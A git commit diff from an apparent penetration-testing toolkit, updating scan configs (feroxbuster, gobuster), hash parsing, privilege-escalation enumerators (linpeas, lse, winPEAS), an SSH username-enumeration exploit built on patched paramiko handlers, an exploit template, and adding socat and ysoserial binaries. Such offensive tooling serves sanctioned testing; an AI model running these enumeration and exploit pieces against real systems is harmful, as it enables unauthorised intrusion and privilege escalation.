This commit is contained in:
Roman Hergenreder 2021-06-30 20:44:38 +02:00
parent 1891efe2e4
commit efc3b655a8
14 changed files with 1245 additions and 1351 deletions

@ -221,7 +221,12 @@ def calculate_elapsed_time(start_time):
async def read_stream(stream, target, tag='?', patterns=[], color=Fore.BLUE): async def read_stream(stream, target, tag='?', patterns=[], color=Fore.BLUE):
address = target.address address = target.address
while True: while True:
line = ""
try:
line = await stream.readline() line = await stream.readline()
except ValueError:
continue
if line: if line:
line = str(line.rstrip(), 'utf8', 'ignore') line = str(line.rstrip(), 'utf8', 'ignore')
debug(color + '[' + Style.BRIGHT + address + ' ' + tag + Style.NORMAL + '] ' + Fore.RESET + '{line}', color=color) debug(color + '[' + Style.BRIGHT + address + ' ' + tag + Style.NORMAL + '] ' + Fore.RESET + '{line}', color=color)
@ -878,4 +883,3 @@ def main():
if __name__ == '__main__': if __name__ == '__main__':
main() main()

@ -59,7 +59,7 @@ service-names = [
] ]
[[finger.scan]] [[finger.scan]]
nmap = 'nmap-finger' name = 'nmap-finger'
command = 'nmap {nmap_extra} -sV -p {port} --script="banner,finger" -oN "{scandir}/{protocol}_{port}_finger_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_finger_nmap.xml" {address}' command = 'nmap {nmap_extra} -sV -p {port} --script="banner,finger" -oN "{scandir}/{protocol}_{port}_finger_nmap.txt" -oX "{scandir}/xml/{protocol}_{port}_finger_nmap.xml" {address}'
[ftp] [ftp]
@ -126,8 +126,8 @@ ignore-service-names = [
command = 'whatweb --color=never --no-errors -a 3 -v {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_whatweb.txt"' command = 'whatweb --color=never --no-errors -a 3 -v {scheme}://{address}:{port} 2>&1 | tee "{scandir}/{protocol}_{port}_{scheme}_whatweb.txt"'
[[http.scan]] [[http.scan]]
name = 'ffuf' name = 'feroxbuster'
command = 'ffuf -u {scheme}://{address}:{port}/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf.txt' command = 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster.txt'
[[http.manual]] [[http.manual]]
description = '(nikto) old but generally reliable web server enumeration tool' description = '(nikto) old but generally reliable web server enumeration tool'
@ -136,10 +136,10 @@ ignore-service-names = [
] ]
[[http.manual]] [[http.manual]]
description = '(ffuf) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:' description = '(feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:'
commands = [ commands = [
'ffuf -u {scheme}://{address}:{port}/FUZZ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf_big.txt', 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/seclists/Discovery/Web-Content/big.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster_big.txt',
'ffuf -u {scheme}://{address}:{port}/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" -v | tee {scandir}/{protocol}_{port}_{scheme}_ffuf_dirbuster.txt' 'feroxbuster -u {scheme}://{address}:{port} -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -o {scandir}/{protocol}_{port}_{scheme}_feroxbuster_dirbuster.txt'
] ]
[[http.manual]] [[http.manual]]
@ -159,8 +159,8 @@ ignore-service-names = [
[[http.manual]] [[http.manual]]
description = '(gobuster v3) Directory/file enumeration for web servers using various wordlists (same as dirb above):' description = '(gobuster v3) Directory/file enumeration for web servers using various wordlists (same as dirb above):'
commands = [ commands = [
'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e -k -l -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_big.txt"', 'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/seclists/Discovery/Web-Content/big.txt -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_big.txt"',
'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -l -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_dirbuster.txt"' 'gobuster dir -u {scheme}://{address}:{port}/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "{scandir}/{protocol}_{port}_{scheme}_gobuster_dirbuster.txt"'
] ]
[[http.manual]] [[http.manual]]

@ -65,6 +65,7 @@ class HashType(enum.Enum):
LM = 3000 LM = 3000
NTLM = 1000 NTLM = 1000
MSSQL = 1731 MSSQL = 1731
NTLMV2_SSP = 5600
# Kerberos # Kerberos
KERBEROS_AS_REQ = 7500 KERBEROS_AS_REQ = 7500
@ -109,9 +110,15 @@ class Hash:
elif crypt_type == "S": elif crypt_type == "S":
self.type.append(HashType.DRUPAL7) self.type.append(HashType.DRUPAL7)
else: else:
self.isSalted = ":" in raw_hash if ":" in raw_hash:
if self.isSalted: parts = raw_hash.split(":")
if len(parts) == 2:
self.isSalted = True
raw_hash, self.salt = raw_hash.split(":") raw_hash, self.salt = raw_hash.split(":")
elif len(parts) == 6:
self.type.append(HashType.NTLMV2_SSP)
# Base64 -> hex # Base64 -> hex
try: try:

@ -132,7 +132,7 @@ class HttpFileServer(HTTPServer):
data = data.encode("UTF-8") data = data.encode("UTF-8")
# return 200 - OK and data # return 200 - OK and data
self.addRoute(name, lambda req: (data, 200)) self.addRoute(name, lambda req: (200, data))
def dumpRequest(self, name): def dumpRequest(self, name):
self.dumpRequests.append(self.cleanPath(name)) self.dumpRequests.append(self.cleanPath(name))

2347
linpeas.sh

File diff suppressed because one or more lines are too long

14
lse.sh

@ -5,7 +5,7 @@
# Author: Diego Blanco <diego.blanco@treitos.com> # Author: Diego Blanco <diego.blanco@treitos.com>
# GitHub: https://github.com/diego-treitos/linux-smart-enumeration # GitHub: https://github.com/diego-treitos/linux-smart-enumeration
# #
lse_version="3.2" lse_version="3.3"
#( Colors #( Colors
# #
@ -582,8 +582,8 @@ lse_run_tests_users() {
#other users in an administrative group #other users in an administrative group
lse_test "usr020" "1" \ lse_test "usr020" "1" \
"Are there other users in an administrative groups?" \ "Are there other users in administrative groups?" \
'grep $lse_grep_opts -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep -Ev ":$" | grep $lse_grep_opts -Ei ":[a-z_-]+\$"' 'grep $lse_grep_opts -E "^(adm|admin|root|sudo|wheel)" /etc/group | grep -Ev ":$|:$lse_user$" | grep $lse_grep_opts -Ei ":[,a-z_-]+\$"'
#other users with shell #other users with shell
lse_test "usr030" "1" \ lse_test "usr030" "1" \
@ -960,7 +960,7 @@ lse_run_tests_recurrent_tasks() {
#can we write to any paths present in cron tasks? #can we write to any paths present in cron tasks?
lse_test "ret050" "1" \ lse_test "ret050" "1" \
"Can we write to any paths present in cron jobs" \ "Can we write to any paths present in cron jobs" \
'for p in `grep --color=never -hERoi "/[a-z0-9_/\.\-]+" /etc/cron* | sort -u`; do [ -w "$p" ] && echo "$p"; done' \ 'for p in `grep --color=never -hERoi "/[a-z0-9_/\.\-]+" /etc/cron* | grep -Ev "/dev/(null|zero|random|urandom)" | sort -u`; do [ -w "$p" ] && echo "$p"; done' \
"" \ "" \
"lse_user_writable_cron_paths" "lse_user_writable_cron_paths"
@ -980,7 +980,7 @@ lse_run_tests_recurrent_tasks() {
#user timers #user timers
lse_test "ret500" "1" \ lse_test "ret500" "1" \
"User systemd timers" \ "User systemd timers" \
'systemctl --user list-timers --all | grep -Ev "(^$|timers listed)"' 'systemctl --user list-timers --all | grep -iq "\.timer" && systemctl --user list-timers --all'
#can we write in any system timer? #can we write in any system timer?
lse_test "ret510" "0" \ lse_test "ret510" "0" \
@ -1026,7 +1026,7 @@ lse_run_tests_network() {
#nameservers #nameservers
lse_test "net530" "2" \ lse_test "net530" "2" \
"Namerservers" \ "Nameservers" \
'grep "nameserver" /etc/resolv.conf' 'grep "nameserver" /etc/resolv.conf'
#systemd nameservers #systemd nameservers
@ -1187,7 +1187,7 @@ lse_run_tests_software() {
#check if there are ssh private keys in ssh-agent #check if there are ssh private keys in ssh-agent
lse_test "sof050" "0" \ lse_test "sof050" "0" \
"Are there private keys in ssh-agent?" \ "Are there private keys in ssh-agent?" \
'ssh-add -l' 'ssh-add -l | grep -iv "agent has no identities"'
#check if there are gpg keys in gpg-agent #check if there are gpg keys in gpg-agent
lse_test "sof060" "0" \ lse_test "sof060" "0" \

BIN
socat Normal file

Binary file not shown.

@ -26,9 +26,7 @@ class InvalidUsername(Exception):
def add_boolean(*args, **kwargs): def add_boolean(*args, **kwargs):
pass pass
old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT]
old_service_accept = paramiko.auth_handler.AuthHandler._handler_table[
paramiko.common.MSG_SERVICE_ACCEPT]
def service_accept(*args, **kwargs): def service_accept(*args, **kwargs):
paramiko.message.Message.add_boolean = add_boolean paramiko.message.Message.add_boolean = add_boolean
@ -55,14 +53,14 @@ def _paramiko_tunnel(username, *args, **kwargs):
return return
try: try:
transport.auth_publickey(us, paramiko.RSAKey.generate(2048)) transport.auth_publickey(us, paramiko.RSAKey.generate(2048))
except InvalidUsername: except InvalidUsername or socket.error:
print ('[*] {} - Invalid username'.format(us)) print ('[*] {} - Invalid username'.format(us))
except paramiko.ssh_exception.AuthenticationException: except paramiko.ssh_exception.AuthenticationException:
print ('[+] {} - Valid username'.format(us)) print ('[+] {} - Valid username'.format(us))
return return
paramiko.auth_handler.AuthHandler._handler_table.update({ paramiko.auth_handler.AuthHandler._client_handler_table.update({
paramiko.common.MSG_SERVICE_ACCEPT: service_accept, paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
}) })
@ -81,7 +79,3 @@ if args.wordlist is not None:
for u in f: for u in f:
usernames.append(u) usernames.append(u)
pool.map(_paramiko_tunnel, usernames) pool.map(_paramiko_tunnel, usernames)

@ -16,6 +16,8 @@ from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning) requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337" BASE_URL = "%s" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
USERNAME = "admin"
PASSWORD = "password"
def login(username, password): def login(username, password):
# Template method to create a session # Template method to create a session
@ -32,7 +34,7 @@ def exploit(session, payload):
pass pass
if __name__ == "__main__": if __name__ == "__main__":
session = login() session = login(USERNAME, PASSWORD)
exploit(session, "id") exploit(session, "id")
""" % baseUrl """ % baseUrl

Binary file not shown.

Binary file not shown.

@ -451,7 +451,7 @@ CALL :T_Progress 1
:UnquotedServicePaths :UnquotedServicePaths
CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS" CALL :ColorLine " %E%33m[+]%E%97m UNQUOTED SERVICE PATHS"
ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Progam.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe' ECHO. [i] When the path is not quoted (ex: C:\Program files\soft\new folder\exec.exe) Windows will try to execute first 'C:\Program.exe', then 'C:\Program Files\soft\new.exe' and finally 'C:\Program Files\soft\new folder\exec.exe'. Try to create 'C:\Program Files\soft\new.exe'
ECHO. [i] The permissions are also checked and filtered using icacls ECHO. [i] The permissions are also checked and filtered using icacls
ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services ECHO. [?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services
for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do ( for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (

Binary file not shown.

BIN
win/ysoserial/ysoserial.exe Normal file

Binary file not shown.